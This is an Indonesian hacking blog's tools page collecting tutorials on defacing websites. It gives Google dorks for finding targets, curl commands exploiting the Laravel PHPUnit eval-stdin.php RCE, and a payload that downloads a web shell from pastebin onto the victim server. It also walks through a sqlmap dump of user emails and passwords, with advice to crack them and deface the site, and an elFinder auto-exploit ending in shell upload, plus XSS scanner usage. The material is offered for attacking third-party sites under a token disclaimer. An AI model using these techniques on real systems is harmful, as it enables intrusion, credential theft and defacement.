Tampilkan postingan dengan label Tools. Tampilkan semua postingan
Tampilkan postingan dengan label Tools. Tampilkan semua postingan

Minggu, 26 Juli 2020

Exploit Laravel PHPUnit RCE ( Remote Code Execution )

Hallo ^_^  kali ini saya akan share tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )


Pertama Dorking dulu dengan dork dibawah in bro

DORK :

inurl:/vendor/phpunit/phpunit/src
inurl:/phpunit/src/Util/PHP/

Exploit  : 

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Ok ku anggap kalian sudah punya tagetnya, langsung saja kita exploitnya seperti ini
Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa.
Disini saya menggunakan curl untuk mengirimkan datanya karena simple dan tidak ribet hehe.
Untuk penggunaanya cukup gunakan parameter -d atau --data

Payload yang bisa digunakan :

<?php echo php_uname(); ?>
<?php echo system('id'); ?>

Contoh command

curl -d "<?php echo php_uname(); ?>" http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Kalau ingin Upload Shell tinggal ubah payloadnya menjadi seperti ini :

<?php system('wget https://pastebin.com/raw/i7VyUpWu -O zero.php'; ?>


Setelah itu buka access Shell kalian di 

http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/zero.php


Mungkin sekian dulu dari saya mengenai artikel tentang tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : phpunit rce, laravel phpunit rce, laravel framework phpunit rce exploit, laravel rce, laravel phpunit remote code execution


Selasa, 28 Januari 2020

XSSSNIPER An automatic XSS discovery tool

XSSSNIPER




xsssniper adalah alat penemuan xss yang berguna dengan fungsi pemindaian massal.

Apa yang dilakukannya adalah memindai URL target untuk parameter GET dan kemudian menyuntikkan muatan XSS (Y) ke dalamnya dan mengurai respons untuk artefak injeksi (Z).
Contoh paling sederhana adalah dengan menyuntikkan <script type = "text / javascript"> window.alert ('lol') </script> dan periksa <script type = "text / javascript"> window.alert ('lol') </script>, jika kami memiliki kecocokan mungkin kami baru saja menemukan XSS.

Jika tidak ada pemeriksaan yang ditentukan, xssniper akan mempertimbangkan muatan dan memeriksa yang sama.

Jika tidak ada payload yang ditentukan juga file khusus akan diuraikan untuk payload umum (lib / payloads.xml, silakan berkontribusi!).

Fitur lain yang bermanfaat adalah kemampuan untuk merayapi URL target untuk tautan relatif. Setiap tautan yang ditemukan ditambahkan ke antrian pemindaian dan diproses, sehingga lebih mudah untuk menguji keseluruhan situs web.

Pada akhirnya, metode ini bukan bukti yang terkecoh, tetapi heuristik yang baik untuk menemukan titik injeksi secara massal dan menguji strategi pelarian. Juga karena tidak ada emulasi browser adalah tugas Anda untuk menguji secara manual injeksi yang ditemukan terhadap berbagai perlindungan xss browser.

Download

git clone https://github.com/gbrindisi/xsssniper.git

Usage

Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:

Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms 
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom 

Copyright (c) 2012, Gianluca Brindisi < g@brindi.si >
Source: https://github.com/gbrindisi/

Senin, 22 Oktober 2018

List Dork Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share List Dork Timthumb V1.XX RCE .
untuk yang belum tau Cara deface dengan Exploit Timthumb V1.XX RCE  bisa kalian liat disini 



DORK Timthumb V1.XX RCE :




Mungkin sekian dulu  dari saya mengenai artikel List Dork Timthumb V1.XX RCE semoga bermanfaat.


Selasa, 30 Januari 2018

Cara sql injection menggunakan sqlmap

Haloo gan , kali ini saya akan share tutorial hacking yaitu  Cara sql injection menggunakan sqlmap untuk hack website, xD .
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
langsung saja ke tutorialnya, pertama siapkan toolsnya dulu bisa kalian cari digoogle yaitu sqlmap dan python kalo di windows, btw saya pake os backbox jadi ga install python sama sqlmap sudah ada langsung osnya.
cari website yang vuln terhadap sqli, bisa kalian cari dengan dork ini.

inurl:index.php?id=
inurl:cat.php?id=
dan kembangin lagi ya :v
saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di mbah google dengan dork diatas.
buka cmd dan ketikan sqlmap btw w pake os backbox jadi langsung ketik aja sqlmap kalo pake windows harus ke dir sqlmap dulu


setelah itu masukan perintah : sqlmap -u http://targetmu.com/index.php?id=12 --dbs
maka hasilnya akan seperti gambar dibawah ini



jika muncul
 "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter

setelah itu kita telah mendapatkan nama databasenya yaitu :
available databases [3]:
[*] information_schema
[*] ntlsinsg_db
[*] ntlsinsg_test
setelah itu kita bongkar isi databasenya yang ke 2 yaitu ntlsinsg_db lalu kita masukan perintah sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db --tables
bingung liat gambar dibawah ini

maka hasilnya seperti dibawh ini

nah sekaran keluarkan tabelnya
Database: ntlsinsg_db
[13 tables]
+---------------+
| ab_policy     |
| bra_countries |
| branches      |
| customer      |
| news          |
| news_file     |
| sch_about_us  |
| sch_areas     |
| sch_countries |
| sch_new       |
| sch_ports     |
| sch_services  |
| users         |
+---------------+

sekarang kita lihat user adminnya kira kira ada di tabel mana mungkin di tabel users mari kita check 
dengan perintah 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users --columns
maka hasilnya akan seperti ini
nah sekarang tahap terakhir yaitu dump dengan perintah seperti ini 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users -C email,password --dump
maka hasilnya akan seperti ini 
dan taraaaaaaaa akhirnya dapat username dan passwordnya sekarang lu crack passwordnya setelah crack  tinggal cari halaman adminnya dan upload shell terus deface :v
mungkin sekian dulu dari saya mengenai artikel Cara sql injection menggunakan sqlmap  semoga bermanfaat 

Cara Deface Dengan Auto Exploit Elfinder

Hello ^^ kali ini saya akan share Cara Deface Dengan Auto Exploit Elfinder
sembelum ke tutorialnya saya berterimakasih kepada Tu5b0l3d dan indoxploit yang bikin toolsnya xD .

yuk langsung saja ke tutorialnya,
dorking langsung kegoogle dengan dork dibawah ini
Dork = inurl:elfinder/files

setelah mendapatkan targetnya kita exploit dengan /php/connector.php
jadi seperti ini http://target.com/path/elfinder/php/connector.php
kalo vuln akan muncul tulisan seperti ini

{"error":["errUnknownCmd"]}

atau lihat gambar seperti dibawah ini





sekarang kita eksekusi dengan tools auto exploitnya
untuk script auto exploitnya disini
https://pastebin.com/S7Y2V19h

buka cmd dan masukan perintah php namafile.php http://target.com/path/elfinder/php/connector.php
maka hasilnya seperti ini

dan terakhir langsung upload shell lagi di
http://target.com/elfinder/files/k.php

terus buka shellnya di http://target.com/elfinder/files/namashellmu.php



Jika kurang jelas bisa lihat di video tutorialnya disini
https://www.youtube.com/watch?v=ZxHd243-cYo

Mungkin sekian dulu  dari saya mengenai artikel Cara Deface Dengan Auto Exploit Elfinder semoga bermanfaat